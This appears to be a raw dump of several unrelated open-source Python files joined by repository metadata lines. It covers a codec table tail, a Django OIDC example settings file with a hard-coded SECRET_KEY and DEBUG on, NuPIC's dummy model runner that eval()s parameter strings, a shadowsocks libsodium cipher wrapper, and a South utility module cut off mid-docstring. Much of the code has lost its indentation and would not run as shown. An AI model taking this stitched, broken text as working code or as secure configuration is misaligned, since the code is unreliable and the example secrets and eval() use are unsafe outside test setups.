u'\xe6' # 0xBF -> LATIN SMALL LETTER AE
u'\u0104' # 0xC0 -> LATIN CAPITAL LETTER A WITH OGONEK
u'\u012e' # 0xC1 -> LATIN CAPITAL LETTER I WITH OGONEK
u'\u0100' # 0xC2 -> LATIN CAPITAL LETTER A WITH MACRON
u'\u0106' # 0xC3 -> LATIN CAPITAL LETTER C WITH ACUTE
u'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\u0118' # 0xC6 -> LATIN CAPITAL LETTER E WITH OGONEK
u'\u0112' # 0xC7 -> LATIN CAPITAL LETTER E WITH MACRON
u'\u010c' # 0xC8 -> LATIN CAPITAL LETTER C WITH CARON
u'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\u0179' # 0xCA -> LATIN CAPITAL LETTER Z WITH ACUTE
u'\u0116' # 0xCB -> LATIN CAPITAL LETTER E WITH DOT ABOVE
u'\u0122' # 0xCC -> LATIN CAPITAL LETTER G WITH CEDILLA
u'\u0136' # 0xCD -> LATIN CAPITAL LETTER K WITH CEDILLA
u'\u012a' # 0xCE -> LATIN CAPITAL LETTER I WITH MACRON
u'\u013b' # 0xCF -> LATIN CAPITAL LETTER L WITH CEDILLA
u'\u0160' # 0xD0 -> LATIN CAPITAL LETTER S WITH CARON
u'\u0143' # 0xD1 -> LATIN CAPITAL LETTER N WITH ACUTE
u'\u0145' # 0xD2 -> LATIN CAPITAL LETTER N WITH CEDILLA
u'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\u014c' # 0xD4 -> LATIN CAPITAL LETTER O WITH MACRON
u'\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xd7' # 0xD7 -> MULTIPLICATION SIGN
u'\u0172' # 0xD8 -> LATIN CAPITAL LETTER U WITH OGONEK
u'\u0141' # 0xD9 -> LATIN CAPITAL LETTER L WITH STROKE
u'\u015a' # 0xDA -> LATIN CAPITAL LETTER S WITH ACUTE
u'\u016a' # 0xDB -> LATIN CAPITAL LETTER U WITH MACRON
u'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\u017b' # 0xDD -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\u017d' # 0xDE -> LATIN CAPITAL LETTER Z WITH CARON
u'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S (German)
u'\u0105' # 0xE0 -> LATIN SMALL LETTER A WITH OGONEK
u'\u012f' # 0xE1 -> LATIN SMALL LETTER I WITH OGONEK
u'\u0101' # 0xE2 -> LATIN SMALL LETTER A WITH MACRON
u'\u0107' # 0xE3 -> LATIN SMALL LETTER C WITH ACUTE
u'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE
u'\u0119' # 0xE6 -> LATIN SMALL LETTER E WITH OGONEK
u'\u0113' # 0xE7 -> LATIN SMALL LETTER E WITH MACRON
u'\u010d' # 0xE8 -> LATIN SMALL LETTER C WITH CARON
u'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
u'\u017a' # 0xEA -> LATIN SMALL LETTER Z WITH ACUTE
u'\u0117' # 0xEB -> LATIN SMALL LETTER E WITH DOT ABOVE
u'\u0123' # 0xEC -> LATIN SMALL LETTER G WITH CEDILLA
u'\u0137' # 0xED -> LATIN SMALL LETTER K WITH CEDILLA
u'\u012b' # 0xEE -> LATIN SMALL LETTER I WITH MACRON
u'\u013c' # 0xEF -> LATIN SMALL LETTER L WITH CEDILLA
u'\u0161' # 0xF0 -> LATIN SMALL LETTER S WITH CARON
u'\u0144' # 0xF1 -> LATIN SMALL LETTER N WITH ACUTE
u'\u0146' # 0xF2 -> LATIN SMALL LETTER N WITH CEDILLA
u'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
u'\u014d' # 0xF4 -> LATIN SMALL LETTER O WITH MACRON
u'\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE
u'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0xF7 -> DIVISION SIGN
u'\u0173' # 0xF8 -> LATIN SMALL LETTER U WITH OGONEK
u'\u0142' # 0xF9 -> LATIN SMALL LETTER L WITH STROKE
u'\u015b' # 0xFA -> LATIN SMALL LETTER S WITH ACUTE
u'\u016b' # 0xFB -> LATIN SMALL LETTER U WITH MACRON
u'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u017c' # 0xFD -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\u017e' # 0xFE -> LATIN SMALL LETTER Z WITH CARON
u'\u2019' # 0xFF -> RIGHT SINGLE QUOTATION MARK
)
### Encoding table
# Inverse mapping (character -> byte) derived from decoding_table.
encoding_table = codecs.charmap_build(decoding_table)
| mit |
Sjord/django-oidc-provider | example_project/provider_app/settings.py | 2 | 1690 | # Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os

# Absolute path to the project root (two levels above this file); used to
# build other paths such as the SQLite database location below.
BASE_DIR = os.path.dirname(os.path.dirname(__file__))


# Quick-start development settings - unsuitable for production

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is hard-coded and committed; acceptable only
# because this is an example project -- never reuse it in production.
SECRET_KEY = 'waw%j=vza!vc1^eyosw%#_!gg96%zb7sp*+!owkutue4i(sm91'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

TEMPLATE_DEBUG = True

ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'provider_app',
    'oidc_provider',
)

MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)

ROOT_URLCONF = 'provider_app.urls'

WSGI_APPLICATION = 'provider_app.wsgi.application'


# Database
# Development-only SQLite database stored alongside the project.

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Internationalization

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)

STATIC_URL = '/static/'

LOGIN_REDIRECT_URL = '/'
# OIDC Provider settings.
SITE_URL = 'http://localhost:8000' | mit |
marionleborgne/nupic | src/nupic/swarming/DummyModelRunner.py | 8 | 25439 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import copy
import itertools
import json
import math
import os
import random
import sys
import time
from nupic.frameworks.opf.modelfactory import ModelFactory
from nupic.frameworks.opf import opfhelpers
from nupic.frameworks.opf.opfutils import ModelResult
from nupic.swarming import utils
from nupic.swarming.ModelRunner import OPFModelRunner
class OPFDummyModelRunner(OPFModelRunner):
  """ This class runs a 'dummy' OPF Experiment. It will periodically update the
  models db with a deterministic metric value. It can also simulate different
  amounts of computation time
  """

  # Class-level counter: each new dummy model takes the next index unless the
  # permutation params supply an explicit '__model_num' (see __init__).
  modelIndex = 0

  # Deterministic metric functions selectable per model; each maps the
  # 1-based record number to a metric value.
  metrics = [lambda x: float(x+1),
             lambda x: 100.0 - x-1,
             lambda x: 20.0 * math.sin(x),
             lambda x: (x/9.0)**2]

  # Defaults for every supported dummy-model parameter; the meaning of each
  # key is documented in the __init__ docstring.
  _DEFAULT_PARAMS = dict(delay= None,
                         finalDelay=None,
                         waitTime=None,
                         randomizeWait=None,
                         iterations=1,
                         metricFunctions=None,
                         metricValue=None,
                         finalize=True,
                         permutationParams={},
                         experimentDirectory=None,
                         makeCheckpoint=False,
                         sysExitModelRange=None,
                         delayModelRange=None,
                         exitAfter=None,
                         errModelRange=None,
                         sleepModelRange=None,
                         jobFailErr=False,
                         )

  # Dummy streamDef.
  _DUMMY_STREAMDEF = dict(
    version = 1,
    info = "test_NoProviders",
    streams = [
      dict(source="file://%s" % (os.path.join("extra", "hotgym",
                                              "joined_mosman_2011.csv")),
           info="hotGym.csv",
           columns=["*"],
           #last_record=-1,
           ),
      ],

    aggregation = {
      'hours': 1,
      'fields': [
          ('consumption', 'sum'),
          ('timestamp', 'first'),
          ('TEMP', 'mean'),
          ('DEWP', 'mean'),
          #('SLP', 'mean'),
          #('STP', 'mean'),
          ('MAX', 'mean'),
          ('MIN', 'mean'),
          ('PRCP', 'sum'),
      ],
    },
    )
  def __init__(self,
               modelID,
               jobID,
               params,
               predictedField,
               reportKeyPatterns,
               optimizeKeyPattern,
               jobsDAO,
               modelCheckpointGUID,
               logLevel=None,
               predictionCacheMaxRecords=None):
    """
    Parameters:
    -------------------------------------------------------------------------
    modelID:            ID of this model in the models table

    jobID:

    params:             a dictionary of parameters for this dummy model. The
                          possible keys are:

                          delay:          OPTIONAL-This specifies the amount of time
                                          (in seconds) that the experiment should wait
                                          before STARTING to process records. This is
                                          useful for simulating workers that start/end
                                          at different times

                          finalDelay:     OPTIONAL-This specifies the amount of time
                                          (in seconds) that the experiment should wait
                                          before it conducts its finalization operations.
                                          These operations include checking if the model
                                          is the best model, and writing out checkpoints.

                          waitTime:       OPTIONAL-The amount of time (in seconds)
                                          to wait in a busy loop to simulate
                                          computation time on EACH ITERATION

                          randomizeWait:  OPTIONAL-([0.0-1.0] ). Default:None
                                          If set to a value, the above specified
                                          wait time will be randomly be dithered by
                                          +/- <randomizeWait>% of the specfied value.
                                          For example, if randomizeWait=0.2, the wait
                                          time will be dithered by +/- 20% of its value.

                          iterations:     OPTIONAL-How many iterations to run the model
                                          for. -1 means run forever (default=1)

                          metricFunctions: OPTIONAL-A list of single argument functions
                                          serialized as strings, which return the metric
                                          value given the record number.

                                          Mutually exclusive with metricValue

                          metricValue:    OPTIONAL-A single value to use for the metric
                                          value (used to debug hypersearch).

                                          Mutually exclusive with metricFunctions

                          finalize:       OPTIONAL-(True/False). Default:True
                                          When False, this will prevent the model from
                                          recording it's metrics and performing other
                                          functions that it usually performs after the
                                          model has finished running

                          permutationParams: A dict containing the instances of all the
                                          variables being permuted over

                          experimentDirectory: REQUIRED-An absolute path to a directory
                                          with a valid description.py file.

                                          NOTE: This does not actually affect the
                                          running of the model or the metrics
                                          produced. It is required to create certain
                                          objects (such as the output stream)

                          makeCheckpoint: True to actually write a checkpoint out to
                                          disk (default: False)

                          sysExitModelRange: A string containing two integers 'firstIdx,
                                          endIdx'. When present, if we are running the
                                          firstIdx'th model up to but not including the
                                          endIdx'th model, then do a sys.exit() while
                                          running the model. This causes the worker to
                                          exit, simulating an orphaned model.

                          delayModelRange: A string containing two integers 'firstIdx,
                                          endIdx'. When present, if we are running the
                                          firstIdx'th model up to but not including the
                                          endIdx'th model, then do a delay of 10 sec.
                                          while running the model. This causes the
                                          worker to run slower and for some other worker
                                          to think the model should be orphaned.

                          exitAfter:      The number of iterations after which the model
                                          should perform a sys exit. This is an
                                          alternative way of creating an orphaned model
                                          that use's the dummmy model's modelIndex
                                          instead of the modelID

                          errModelRange:  A string containing two integers 'firstIdx,
                                          endIdx'. When present, if we are running the
                                          firstIdx'th model up to but not including the
                                          endIdx'th model, then raise an exception while
                                          running the model. This causes the model to
                                          fail with a CMPL_REASON_ERROR reason

                          sleepModelRange: A string containing 3 integers 'firstIdx,
                                          endIdx: delay'. When present, if we are running
                                          the firstIdx'th model up to but not including
                                          the endIdx'th model, then sleep for delay
                                          seconds at the beginning of the run.

                          jobFailErr:     If true, model will raise a JobFailException
                                          which should cause the job to be marked as
                                          failed and immediately cancel all other workers.

    predictedField:     Name of the input field for which this model is being
                        optimized

    reportKeyPatterns:  list of items from the results dict to include in
                        the report. These can be regular expressions.

    optimizeKeyPattern: Which report item, if any, we will be optimizing for.
                        This can also be a regular expression, but is an error
                        if it matches more than one key from the experiment's
                        results.

    jobsDAO:            Jobs data access object - the interface to the
                        jobs database which has the model's table.

    modelCheckpointGUID:
                        A persistent, globally-unique identifier for
                        constructing the model checkpoint key

    logLevel:           override logging level to this value, if not None

    predictionCacheMaxRecords:
                        Maximum number of records for the prediction output cache.
                        Pass None for the default value.
    """
    # NOTE(review): the base class is deliberately given
    # predictionCacheMaxRecords=None while the caller-supplied value is kept
    # on self below -- presumably intentional for the dummy runner; confirm.
    super(OPFDummyModelRunner, self).__init__(modelID=modelID,
                                              jobID=jobID,
                                              predictedField=predictedField,
                                              experimentDir=None,
                                              reportKeyPatterns=reportKeyPatterns,
                                              optimizeKeyPattern=optimizeKeyPattern,
                                              jobsDAO=jobsDAO,
                                              modelCheckpointGUID=modelCheckpointGUID,
                                              logLevel=logLevel,
                                              predictionCacheMaxRecords=None)

    self._predictionCacheMaxRecords = predictionCacheMaxRecords

    # Deep copies so per-instance mutation never leaks into the class-level
    # templates.
    self._streamDef = copy.deepcopy(self._DUMMY_STREAMDEF)

    self._params = copy.deepcopy(self._DEFAULT_PARAMS)

    # -----------------------------------------------------------------------
    # Read the index of the current model in the test
    if 'permutationParams' in params \
        and '__model_num' in params['permutationParams']:
      self.modelIndex=params['permutationParams']['__model_num']
    else:
      self.modelIndex = OPFDummyModelRunner.modelIndex
      OPFDummyModelRunner.modelIndex += 1

    # -----------------------------------------------------------------------
    self._loadDummyModelParameters(params)

    # =========================================================================
    # Load parameters into instance variables
    # =========================================================================
    self._logger.debug("Using Dummy model params: %s", self._params)

    self._busyWaitTime = self._params['waitTime']
    self._iterations = self._params['iterations']
    self._doFinalize = self._params['finalize']
    self._delay = self._params['delay']
    self._sleepModelRange = self._params['sleepModelRange']
    self._makeCheckpoint = self._params['makeCheckpoint']
    self._finalDelay = self._params['finalDelay']
    self._exitAfter = self._params['exitAfter']

    # =========================================================================
    # Randomize Wait time, if necessary
    # =========================================================================
    self.randomizeWait = self._params['randomizeWait']
    if self._busyWaitTime is not None:
      self.__computeWaitTime()

    # =========================================================================
    # Load the appropriate metric value or metric function
    # =========================================================================
    if self._params['metricFunctions'] is not None \
        and self._params['metricValue'] is not None:
      raise RuntimeError("Error, only 1 of 'metricFunctions' or 'metricValue'"\
                         " can be passed to OPFDummyModelRunner params ")

    self.metrics = None
    self.metricValue = None

    if self._params['metricFunctions'] is not None:
      # NOTE(review): eval() executes an arbitrary string from the params;
      # acceptable only because this is test-only infrastructure driven by
      # trusted inputs.
      self.metrics = eval(self._params['metricFunctions'])
    elif self._params['metricValue'] is not None:
      self.metricValue = float(self._params['metricValue'])
    else:
      self.metrics = OPFDummyModelRunner.metrics[0]

    # =========================================================================
    # Create an OpfExperiment instance, if a directory is specified
    # =========================================================================
    if self._params['experimentDirectory'] is not None:
      self._model = self.__createModel(self._params['experimentDirectory'])
      self.__fieldInfo = self._model.getFieldInfo()

    # =========================================================================
    # Get the sysExit model range
    # =========================================================================
    self._sysExitModelRange = self._params['sysExitModelRange']
    if self._sysExitModelRange is not None:
      self._sysExitModelRange = [int(x) for x in self._sysExitModelRange.split(',')]

    # =========================================================================
    # Get the delay model range
    # =========================================================================
    self._delayModelRange = self._params['delayModelRange']
    if self._delayModelRange is not None:
      self._delayModelRange = [int(x) for x in self._delayModelRange.split(',')]

    # =========================================================================
    # Get the errModel range
    # =========================================================================
    self._errModelRange = self._params['errModelRange']
    if self._errModelRange is not None:
      self._errModelRange = [int(x) for x in self._errModelRange.split(',')]

    self._computModelDelay()

    # Get the jobFailErr boolean
    self._jobFailErr = self._params['jobFailErr']

    self._logger.debug("Dummy Model %d params %r", self._modelID, self._params)
def _loadDummyModelParameters(self, params):
""" Loads all the parameters for this dummy model. For any paramters
specified as lists, read the appropriate value for this model using the model
index """
for key, value in params.iteritems():
if type(value) == list:
index = self.modelIndex % len(params[key])
self._params[key] = params[key][index]
else:
self._params[key] = params[key]
def _computModelDelay(self):
    """ Computes the amount of time (if any) to delay the run of this model.
    This can be determined by two mutually exclusive parameters:
    delay and sleepModelRange.
    'delay' specifies the number of seconds a model should be delayed. If a list
    is specified, the appropriate amount of delay is determined by using the
    model's modelIndex property.
    However, this doesn't work when testing orphaned models, because the
    modelIndex will be the same for every recovery attempt. Therefore, every
    recovery attempt will also be delayed and potentially orphaned.
    'sleepModelRange' doesn't use the modelIndex property for a model, but rather
    sees which order the model is in the database, and uses that to determine
    whether or not a model should be delayed.
    """
    # 'delay' and 'sleepModelRange' are mutually exclusive
    if self._params['delay'] is not None \
          and self._params['sleepModelRange'] is not None:
        raise RuntimeError("Only one of 'delay' or "
                           "'sleepModelRange' may be specified")

    # Get the sleepModel range
    # NOTE(review): self._sleepModelRange is presumably assigned in
    # __init__ (not visible here) from the 'sleepModelRange' param —
    # confirm against the constructor.
    if self._sleepModelRange is not None:
        # Format is "<begIdx>,<endIdx>:<delaySeconds>"
        range, delay = self._sleepModelRange.split(':')
        delay = float(delay)
        # NOTE: 'range' shadows the builtin here, and the indexed
        # assignment below relies on Python 2's map() returning a list.
        range = map(int, range.split(','))

        # Look up this model's position among all models of the job.
        modelIDs = self._jobsDAO.jobGetModelIDs(self._jobID)
        modelIDs.sort()

        # Clamp the end of the range to the number of models present.
        range[1] = min(range[1], len(modelIDs))

        # If the model is in range, add the delay
        if self._modelID in modelIDs[range[0]:range[1]]:
            self._delay = delay
    else:
        # No positional range configured: use the per-model 'delay' param
        # (may be None, meaning no delay).
        self._delay = self._params['delay']
def _getMetrics(self):
""" Protected function that can be overridden by subclasses. Its main purpose
is to allow the the OPFDummyModelRunner to override this with deterministic
values
Returns: All the metrics being computed for this model
"""
metric = None
if self.metrics is not None:
metric = self.metrics(self._currentRecordIndex+1)
elif self.metricValue is not None:
metric = self.metricValue
else:
raise RuntimeError('No metrics or metric value specified for dummy model')
return {self._optimizeKeyPattern:metric}
def run(self):
    """ Runs the given OPF task against the given Model instance.

    Simulates a real model run: iterates self._iterations times (or
    forever when negative), writing a dummy prediction per record, while
    honoring the various test hooks (sysExit / delay / error model
    ranges, jobFailErr) used by the hypersearch unit tests to fabricate
    orphaned, slow, or failing models.

    Returns: (completionReason, None) tuple.
    """
    self._logger.debug("Starting Dummy Model: modelID=%s;" % (self._modelID))

    # =========================================================================
    # Initialize periodic activities (e.g., for model result updates)
    # =========================================================================
    periodic = self._initPeriodicActivities()

    self._optimizedMetricLabel = self._optimizeKeyPattern
    self._reportMetricLabels = [self._optimizeKeyPattern]

    # =========================================================================
    # Create our top-level loop-control iterator
    # =========================================================================
    # Negative iteration count means "run until killed/canceled".
    if self._iterations >= 0:
        iterTracker = iter(xrange(self._iterations))
    else:
        iterTracker = iter(itertools.count())

    # =========================================================================
    # This gets set in the unit tests. It tells the worker to sys exit
    # the first N models. This is how we generate orphaned models
    doSysExit = False
    if self._sysExitModelRange is not None:
        modelAndCounters = self._jobsDAO.modelsGetUpdateCounters(self._jobID)
        modelIDs = [x[0] for x in modelAndCounters]
        modelIDs.sort()
        (beg,end) = self._sysExitModelRange
        if self._modelID in modelIDs[int(beg):int(end)]:
            doSysExit = True

    # Delay (rather than kill) models whose database position falls in
    # the configured range.
    if self._delayModelRange is not None:
        modelAndCounters = self._jobsDAO.modelsGetUpdateCounters(self._jobID)
        modelIDs = [x[0] for x in modelAndCounters]
        modelIDs.sort()
        (beg,end) = self._delayModelRange
        if self._modelID in modelIDs[int(beg):int(end)]:
            time.sleep(10)

        # DEBUG!!!! infinite wait if we have 50 models
        #if len(modelIDs) >= 50:
        #  jobCancel = self._jobsDAO.jobGetFields(self._jobID, ['cancel'])[0]
        #  while not jobCancel:
        #    time.sleep(1)
        #    jobCancel = self._jobsDAO.jobGetFields(self._jobID, ['cancel'])[0]

    # Raise an error for models whose database position falls in the
    # configured error range (simulates model failures).
    if self._errModelRange is not None:
        modelAndCounters = self._jobsDAO.modelsGetUpdateCounters(self._jobID)
        modelIDs = [x[0] for x in modelAndCounters]
        modelIDs.sort()
        (beg,end) = self._errModelRange
        if self._modelID in modelIDs[int(beg):int(end)]:
            raise RuntimeError("Exiting with error due to errModelRange parameter")

    # =========================================================================
    # Delay, if necessary
    if self._delay is not None:
        time.sleep(self._delay)

    # =========================================================================
    # Run it!
    # =========================================================================
    self._currentRecordIndex = 0
    while True:

        # =========================================================================
        # Check if the model should be stopped
        # =========================================================================

        # If killed by a terminator, stop running
        if self._isKilled:
            break

        # If job stops or hypersearch ends, stop running
        if self._isCanceled:
            break

        # If model is mature, stop running ONLY IF we are not the best model
        # for the job. Otherwise, keep running so we can keep returning
        # predictions to the user
        if self._isMature:
            if not self._isBestModel:
                self._cmpReason = self._jobsDAO.CMPL_REASON_STOPPED
                break
            else:
                self._cmpReason = self._jobsDAO.CMPL_REASON_EOF

        # =========================================================================
        # Get the the next record, and "write it"
        # =========================================================================
        try:
            self._currentRecordIndex = next(iterTracker)
        except StopIteration:
            break

        # "Write" a dummy output value. This is used to test that the batched
        # writing works properly
        self._writePrediction(ModelResult(None, None, None, None))

        periodic.tick()

        # =========================================================================
        # Compute wait times. See if model should exit
        # =========================================================================

        if self.__shouldSysExit(self._currentRecordIndex):
            sys.exit(1)

        # Simulate computation time
        if self._busyWaitTime is not None:
            time.sleep(self._busyWaitTime)
            self.__computeWaitTime()

        # Asked to abort after so many iterations?
        if doSysExit:
            sys.exit(1)

        # Asked to raise a jobFailException?
        if self._jobFailErr:
            raise utils.JobFailException("E10000",
                                         "dummyModel's jobFailErr was True.")

    # =========================================================================
    # Handle final operations
    # =========================================================================
    if self._doFinalize:
        if not self._makeCheckpoint:
            self._model = None

        # Delay finalization operation
        if self._finalDelay is not None:
            time.sleep(self._finalDelay)

        self._finalize()

    self._logger.info("Finished: modelID=%r "% (self._modelID))

    return (self._cmpReason, None)
def __computeWaitTime(self):
    # Re-randomize the simulated per-record computation time: pick a new
    # busy-wait uniformly within +/- randomizeWait fraction of the
    # current value. NOTE(review): this mutates _busyWaitTime in place,
    # so repeated calls random-walk the baseline — presumably intended
    # for the dummy model; confirm before reusing elsewhere.
    if self.randomizeWait is not None:
        self._busyWaitTime = random.uniform((1.0-self.randomizeWait) * self._busyWaitTime,
                                            (1.0+self.randomizeWait) * self._busyWaitTime)
def __createModel(self, expDir):
    """Instantiate an OPF model from the experiment under ``expDir``.

    Loads the experiment's description.py, extracts its description
    interface, and hands the resulting model description to
    ModelFactory.

    expDir:  path to an OPF experiment directory.
    Returns: the constructed model instance.
    """
    descriptionModule = opfhelpers.loadExperimentDescriptionScriptFromDir(
        expDir)
    experiment = opfhelpers.getExperimentDescriptionInterfaceFromModule(
        descriptionModule)
    return ModelFactory.create(experiment.getModelDescription())
def _createPredictionLogger(self):
"""
Creates the model's PredictionLogger object, which is an interface to write
model results to a permanent storage location
"""
class DummyLogger:
def writeRecord(self, record): pass
def writeRecords(self, records, progressCB): pass
def close(self): pass
self._predictionLogger = DummyLogger()
def __shouldSysExit(self, iteration):
    """
    Checks to see if the model should exit based on the exitAfter dummy
    parameter

    iteration: 0-based index of the record just processed.
    Returns:   True only once the iteration threshold is reached AND this
               model is the first (lowest model ID) of the models sharing
               its __model_num — so exactly one model per particle exits.
    """
    if self._exitAfter is None \
       or iteration < self._exitAfter:
        return False

    # Fetch every model of the job with its serialized params; the
    # model number lives inside the JSON-encoded params blob.
    results = self._jobsDAO.modelsGetFieldsForJob(self._jobID, ['params'])

    modelIDs = [e[0] for e in results]
    modelNums = [json.loads(e[1][0])['structuredParams']['__model_num'] for e in results]

    # Keep only the (modelID, modelNum) pairs that share our model number.
    # NOTE: relies on Python 2 semantics — filter() returns a list and
    # zip(*...)[0] indexes a list of tuples.
    sameModelNumbers = filter(lambda x: x[1] == self.modelIndex,
                              zip(modelIDs, modelNums))

    firstModelID = min(zip(*sameModelNumbers)[0])

    return firstModelID == self._modelID
| agpl-3.0 |
dzhuang/shadowsocks-1 | shadowsocks/crypto/sodium.py | 1032 | 3778 | #!/usr/bin/env python
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
from ctypes import c_char_p, c_int, c_ulonglong, byref, \
create_string_buffer, c_void_p
from shadowsocks.crypto import util
__all__ = ['ciphers']
libsodium = None
loaded = False
buf_size = 2048
# for salsa20 and chacha20
BLOCK_SIZE = 64
def load_libsodium():
    """Locate libsodium, declare the ctypes signatures used by this
    module, and allocate the shared output buffer.

    Sets the module globals ``libsodium``, ``buf`` and ``loaded``; raises
    if the shared library cannot be found.
    """
    global loaded, libsodium, buf

    libsodium = util.find_library('sodium', 'crypto_stream_salsa20_xor_ic',
                                  'libsodium')
    if libsodium is None:
        raise Exception('libsodium not found')

    # int crypto_stream_salsa20_xor_ic(out, in, inlen, nonce, ic, key)
    libsodium.crypto_stream_salsa20_xor_ic.restype = c_int
    libsodium.crypto_stream_salsa20_xor_ic.argtypes = (c_void_p, c_char_p,
                                                       c_ulonglong,
                                                       c_char_p, c_ulonglong,
                                                       c_char_p)
    # Same signature for the ChaCha20 variant.
    libsodium.crypto_stream_chacha20_xor_ic.restype = c_int
    libsodium.crypto_stream_chacha20_xor_ic.argtypes = (c_void_p, c_char_p,
                                                        c_ulonglong,
                                                        c_char_p, c_ulonglong,
                                                        c_char_p)

    # Shared output buffer; grown on demand by SodiumCrypto.update().
    buf = create_string_buffer(buf_size)
    loaded = True
class SodiumCrypto(object):
    """Stream cipher (Salsa20 / ChaCha20) backed by libsodium.

    These are XOR stream ciphers, so the same code path serves both
    encryption and decryption; the ``op`` argument is accepted for
    interface compatibility but not used.
    """

    def __init__(self, cipher_name, key, iv, op):
        # Lazily load and configure libsodium on first instantiation.
        if not loaded:
            load_libsodium()
        self.key = key
        self.iv = iv
        self.key_ptr = c_char_p(key)
        self.iv_ptr = c_char_p(iv)
        if cipher_name == 'salsa20':
            self.cipher = libsodium.crypto_stream_salsa20_xor_ic
        elif cipher_name == 'chacha20':
            self.cipher = libsodium.crypto_stream_chacha20_xor_ic
        else:
            raise Exception('Unknown cipher')
        # byte counter, not block counter
        self.counter = 0

    def update(self, data):
        """Encrypt/decrypt ``data``, keeping the keystream position
        across calls via ``self.counter``."""
        global buf_size, buf
        l = len(data)

        # we can only prepend some padding to make the encryption align to
        # blocks
        padding = self.counter % BLOCK_SIZE
        # Grow the shared module-level buffer if this chunk won't fit.
        if buf_size < padding + l:
            buf_size = (padding + l) * 2
            buf = create_string_buffer(buf_size)

        if padding:
            data = (b'\0' * padding) + data
        # ic is the 64-byte *block* counter; self.counter counts bytes.
        self.cipher(byref(buf), c_char_p(data), padding + l,
                    self.iv_ptr, int(self.counter / BLOCK_SIZE), self.key_ptr)
        self.counter += l
        # buf is copied to a str object when we access buf.raw
        # strip off the padding
        return buf.raw[padding:padding + l]
# Cipher registry consumed by shadowsocks: name -> (key size, iv size, class).
ciphers = {
    'salsa20': (32, 8, SodiumCrypto),
    'chacha20': (32, 8, SodiumCrypto),
}


def test_salsa20():
    # Round-trip self-test: encrypt then decrypt with a matching key/iv
    # pair and compare (run_cipher performs the comparison).
    cipher = SodiumCrypto('salsa20', b'k' * 32, b'i' * 16, 1)
    decipher = SodiumCrypto('salsa20', b'k' * 32, b'i' * 16, 0)

    util.run_cipher(cipher, decipher)


def test_chacha20():
    # Same round-trip self-test for the ChaCha20 variant.
    cipher = SodiumCrypto('chacha20', b'k' * 32, b'i' * 16, 1)
    decipher = SodiumCrypto('chacha20', b'k' * 32, b'i' * 16, 0)

    util.run_cipher(cipher, decipher)


if __name__ == '__main__':
    test_chacha20()
    test_salsa20()
| apache-2.0 |
nirmeshk/oh-mainline | vendor/packages/south/south/utils/__init__.py | 119 | 1945 | """
Generally helpful utility functions.
"""
def _ask_for_it_by_name(name):
    "Returns an object referenced by absolute path."
    parts = str(name).split(".")
    leaf = parts[-1]
    ## what if there is no absolute reference?
    if len(parts) == 1:
        # A bare module name: import and return the module itself.
        return __import__(leaf, {}, {}, leaf)
    # Import the containing module, then pull the named attribute off it.
    container = __import__(".".join(parts[:-1]), {}, {}, leaf)
    return getattr(container, leaf)


def ask_for_it_by_name(name):
    "Returns an object referenced by absolute path. (Memoised outer wrapper)"
    cache = ask_for_it_by_name.cache
    if name not in cache:
        cache[name] = _ask_for_it_by_name(name)
    return cache[name]
ask_for_it_by_name.cache = {}
def get_attribute(item, attribute):
    """
    Like getattr, but recursive (i.e. you can ask for 'foo.bar.yay'.)
